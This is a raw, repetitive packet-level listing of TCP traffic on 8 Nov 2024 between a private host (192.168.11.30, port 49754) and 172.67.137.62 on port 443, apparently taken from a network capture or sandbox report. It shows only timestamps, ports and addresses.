                                                                                                                          Nov 8, 2024 10:59:46.525772095 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.525919914 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.525933981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.526094913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.526101112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.526185989 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.527158976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.527172089 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.527318001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.527443886 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.527448893 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.528188944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.528204918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.528367996 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.528373957 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.528431892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.528564930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.528991938 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.529005051 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.529162884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.529162884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.529267073 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.529272079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.529664993 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.529679060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.529865026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.529870033 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.529942989 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.530761957 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.530775070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.530915022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.530921936 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.530982971 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.531089067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.531672955 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.531687021 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.531941891 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.531946898 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.532032967 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.532517910 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.532532930 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.532670021 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.532675982 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.532747984 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.532855034 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.533483028 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.533494949 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.533699989 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.533705950 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.533777952 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.534236908 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.534251928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.534415960 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.534420967 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.534490108 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.534528017 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.534606934 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.534612894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.534831047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.535316944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.535329103 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.535494089 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.535712004 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.535717964 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.536679983 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.536696911 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.536844015 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.536849976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.536912918 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.537118912 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.537170887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.537183046 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.537313938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.537389994 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.537395000 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.537548065 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.538058043 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.538074017 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.538325071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.538331985 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.538403034 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.538913965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.538924932 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.539108038 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.539113998 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.539154053 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.539289951 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.539918900 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.539931059 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.540081024 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.540148020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.540153027 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.540239096 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.540783882 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.540798903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.540941000 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.540946960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.541044950 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.541224003 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.541336060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.541347980 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.541526079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.541616917 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.541621923 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.542371988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.542515039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.542520046 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.542650938 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.542692900 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.542697906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.542813063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.542879105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.543251991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.543265104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.543489933 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.543494940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.543566942 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.544243097 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.544258118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.544387102 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.544392109 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.544604063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.544889927 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.544902086 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.545037031 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.545192003 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.545197964 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.545887947 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.545902967 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.546037912 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.546042919 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.546102047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.546192884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.546753883 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.546766043 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.546909094 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.547090054 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.547095060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.547594070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.547609091 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.547802925 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.547806978 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.547893047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.548368931 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.548382044 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.548559904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.548566103 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.548636913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.548754930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.549364090 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.549376011 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.549587011 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.549592018 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.549676895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.550218105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.550234079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.550379992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.550384998 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.550443888 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.550534964 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.551147938 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.551161051 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.551290035 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.551367998 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.551373005 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.551467896 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.551712036 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.551723003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.551872015 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.551877975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.551883936 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.552068949 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.552925110 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.552937984 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.553109884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.553240061 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.553245068 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.553575039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.553586960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.553720951 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.553725958 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.553915977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.554231882 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.554383039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.554630995 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.750737906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.750799894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.750884056 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.751056910 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.751074076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.751081944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.751260042 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.751969099 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.751981020 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.752120972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.752130985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.752137899 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.752192020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.752196074 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.752321959 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.752494097 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.752763987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.752886057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.752959013 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.752964020 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.753040075 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.753726006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.753736973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.753961086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.753963947 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.754102945 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.754232883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.754605055 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.754615068 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.754755974 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.755132914 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.755136013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.755387068 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.755398989 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.755574942 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.755578041 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.755625010 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.755783081 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.756221056 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.756234884 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.756354094 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.756433964 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.756444931 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.756582022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.757172108 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.757194996 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.757386923 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.757399082 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.757579088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.758141994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.758157969 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.758421898 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.758605957 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.758616924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.758724928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.759114981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.759128094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.759282112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.759291887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.759449005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.759716034 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.759726048 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.759881020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.759927988 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.759932995 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.760050058 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.761022091 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.761033058 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.761229992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.761236906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.761298895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.761441946 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.761699915 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.761709929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.761868954 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.762063980 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.762073994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.762623072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.762634039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.762803078 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.762808084 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.762871981 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.762980938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.763463020 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.763473034 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.763629913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.763776064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.763782024 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.763813972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.764025927 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.764036894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.764180899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.764185905 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.764287949 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.764360905 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.764833927 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.764842987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.765000105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.765089035 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.765093088 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.765180111 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.765717030 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.765727043 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.765896082 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.765899897 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.766063929 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.766424894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.766433001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.766583920 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.766778946 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.766783953 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.767381907 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.767391920 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.767559052 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.767565012 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.767637968 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.767728090 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.768368006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.768376112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.768516064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.768600941 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.768605947 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.768687010 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.769001961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.769012928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.769159079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.769165039 CET44349754172.67.137.62192.168.11.30
